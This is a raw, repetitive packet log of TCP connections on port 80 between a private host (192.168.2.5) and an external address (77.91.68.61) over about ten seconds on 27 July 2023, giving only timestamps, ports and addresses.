Jul 27, 2023 01:35:21.792856932 CEST	80	50244	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.792937040 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.792987108 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.793728113 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.837999105 CEST	80	50244	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.842089891 CEST	80	50244	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.842288971 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.957798004 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.965116024 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.002238989 CEST	80	50244	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.002778053 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.009813070 CEST	80	50245	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.011459112 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.035578966 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.080373049 CEST	80	50245	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.084193945 CEST	80	50245	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.084765911 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.207595110 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.208518028 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.253009081 CEST	80	50245	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.253932953 CEST	80	50246	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.254019976 CEST	50245	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.254101038 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.260360003 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.304799080 CEST	80	50246	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.308937073 CEST	80	50246	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.311489105 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.428608894 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.432781935 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.473069906 CEST	80	50246	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.473345995 CEST	50246	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.476705074 CEST	80	50247	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.478846073 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.484026909 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.528647900 CEST	80	50247	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.531964064 CEST	80	50247	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.532767057 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.644707918 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.645539045 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.688776016 CEST	80	50247	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.688872099 CEST	50247	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.689568996 CEST	80	50248	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.689673901 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.690012932 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.733805895 CEST	80	50248	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.737277031 CEST	80	50248	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.737762928 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.847990990 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.851671934 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.892088890 CEST	80	50248	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.892199039 CEST	50248	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.895988941 CEST	80	50249	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.896141052 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.896531105 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:22.941034079 CEST	80	50249	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.944031954 CEST	80	50249	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:22.944185019 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.057553053 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.058810949 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.101970911 CEST	80	50249	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.102054119 CEST	50249	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.103171110 CEST	80	50250	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.103262901 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.103602886 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.147950888 CEST	80	50250	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.152128935 CEST	80	50250	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.152245045 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.270258904 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.271631956 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.315462112 CEST	80	50250	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.315892935 CEST	80	50251	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.315995932 CEST	50250	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.316028118 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.322489023 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.366868973 CEST	80	50251	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.370642900 CEST	80	50251	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.371088028 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.490350008 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.491441011 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.534866095 CEST	80	50251	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.535167933 CEST	50251	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.535996914 CEST	80	50252	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.536140919 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.536578894 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:23.581134081 CEST	80	50252	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.585880041 CEST	80	50252	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:23.586121082 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.006236076 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.007304907 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.050822020 CEST	80	50252	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.050957918 CEST	50252	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.051383972 CEST	80	50253	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.051512957 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.056982994 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.101165056 CEST	80	50253	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.105285883 CEST	80	50253	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.105468035 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.271615982 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.300225019 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.315589905 CEST	80	50253	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.315685034 CEST	50253	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.344172001 CEST	80	50254	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.344284058 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.347965002 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.392086983 CEST	80	50254	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.394658089 CEST	80	50254	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.394759893 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.513478041 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.514156103 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.557447910 CEST	80	50254	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.557528019 CEST	50254	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.558408022 CEST	80	50255	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.558490038 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.564244986 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:24.608669996 CEST	80	50255	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.612615108 CEST	80	50255	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:24.612725973 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.137062073 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.137773037 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.181459904 CEST	80	50255	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.181680918 CEST	50255	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.181863070 CEST	80	50256	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.181961060 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.213677883 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.257781029 CEST	80	50256	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.261785984 CEST	80	50256	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.261867046 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.405674934 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.406331062 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.450052023 CEST	80	50256	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.450108051 CEST	80	50257	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.450162888 CEST	50256	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.450208902 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.454958916 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.498845100 CEST	80	50257	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.503771067 CEST	80	50257	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.503952980 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.717504978 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:25.761766911 CEST	80	50257	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:25.761965990 CEST	50257	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:26.573446989 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:26.617954016 CEST	80	50258	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:26.618119955 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:26.737296104 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:26.781604052 CEST	80	50258	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:26.786570072 CEST	80	50258	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:26.787182093 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.077827930 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.078550100 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.122194052 CEST	80	50258	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.122375965 CEST	50258	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.123131990 CEST	80	50259	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.123291969 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.207518101 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.252604961 CEST	80	50259	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.256613970 CEST	80	50259	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.256702900 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.380500078 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.381181002 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.425237894 CEST	80	50259	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.425368071 CEST	50259	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.425508022 CEST	80	50260	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.425645113 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.436080933 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.483023882 CEST	80	50260	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.484719992 CEST	80	50260	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.484802008 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.600287914 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.601157904 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.644701004 CEST	80	50260	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.644769907 CEST	50260	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.645798922 CEST	80	50261	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.645899057 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.646238089 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.690705061 CEST	80	50261	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.694983959 CEST	80	50261	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.695118904 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.827982903 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.828955889 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.872721910 CEST	80	50261	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.872747898 CEST	80	50262	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.872811079 CEST	50261	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.872859955 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.877113104 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:27.921056986 CEST	80	50262	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.924724102 CEST	80	50262	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:27.924793959 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.039179087 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.039808035 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.083236933 CEST	80	50262	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.083378077 CEST	50262	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.084420919 CEST	80	50263	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.084573984 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.092830896 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.137605906 CEST	80	50263	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.141859055 CEST	80	50263	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.141968966 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.271851063 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.272672892 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.316499949 CEST	80	50263	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.316612005 CEST	50263	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.317014933 CEST	80	50264	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.317095041 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.327436924 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.371876001 CEST	80	50264	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.376115084 CEST	80	50264	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.376225948 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.502619028 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.503565073 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.547482967 CEST	80	50264	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.547565937 CEST	50264	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.548233986 CEST	80	50265	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.548355103 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.553200960 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.597929955 CEST	80	50265	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.601458073 CEST	80	50265	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.601588964 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.709814072 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.710673094 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.754776001 CEST	80	50266	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.754810095 CEST	80	50265	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.754919052 CEST	50265	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.754931927 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.756532907 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.800626993 CEST	80	50266	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.804827929 CEST	80	50266	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.805305958 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.912935972 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.933976889 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.957361937 CEST	80	50266	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.957469940 CEST	50266	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.978188992 CEST	80	50267	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:28.978383064 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:28.978720903 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.022614956 CEST	80	50267	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.026982069 CEST	80	50267	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.027091980 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.129539013 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.132539988 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.174093962 CEST	80	50267	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.174344063 CEST	50267	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.177057981 CEST	80	50268	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.177232027 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.178338051 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.222620964 CEST	80	50268	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.226959944 CEST	80	50268	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.228593111 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.339957952 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.341357946 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.384309053 CEST	80	50268	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.384624958 CEST	50268	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.385946035 CEST	80	50269	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.386054993 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.388073921 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.432682991 CEST	80	50269	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.436691046 CEST	80	50269	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.437890053 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.578425884 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.579282045 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.623147964 CEST	80	50269	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.623476982 CEST	80	50270	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.623488903 CEST	50269	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.623572111 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.624015093 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.668206930 CEST	80	50270	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.671662092 CEST	80	50270	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.671838045 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.788449049 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.789385080 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.832967043 CEST	80	50270	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.833424091 CEST	50270	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.834067106 CEST	80	50271	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.834178925 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.841355085 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:29.886042118 CEST	80	50271	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.890919924 CEST	80	50271	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:29.891777992 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.004122019 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.004790068 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.048729897 CEST	80	50272	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.048754930 CEST	80	50271	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.048873901 CEST	50271	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.048928022 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.049351931 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.093214989 CEST	80	50272	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.097923994 CEST	80	50272	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.100029945 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.217442989 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.218199015 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.261662960 CEST	80	50272	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.262906075 CEST	80	50273	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.263094902 CEST	50272	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.263134003 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.264059067 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.314142942 CEST	80	50273	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.315011024 CEST	80	50273	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.315154076 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.453721046 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.454993010 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.506745100 CEST	80	50274	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.506941080 CEST	80	50273	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.507098913 CEST	50273	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.507101059 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.507813931 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.552172899 CEST	80	50274	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.556301117 CEST	80	50274	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.559922934 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.677253962 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.678214073 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.721606970 CEST	80	50274	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.722465992 CEST	80	50275	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.722593069 CEST	50274	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.722625971 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.723264933 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.767232895 CEST	80	50275	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.771037102 CEST	80	50275	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.771168947 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.879338980 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.889312029 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.923652887 CEST	80	50275	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.923824072 CEST	50275	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.934006929 CEST	80	50276	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:30.934161901 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:30.957941055 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.002408981 CEST	80	50276	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.008023977 CEST	80	50276	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.008152008 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.115032911 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.116991997 CEST	50277	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.159540892 CEST	80	50276	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.159763098 CEST	50276	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:31.161293983 CEST	80	50277	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:31.161518097 CEST	50277	80	192.168.2.5	77.91.68.61
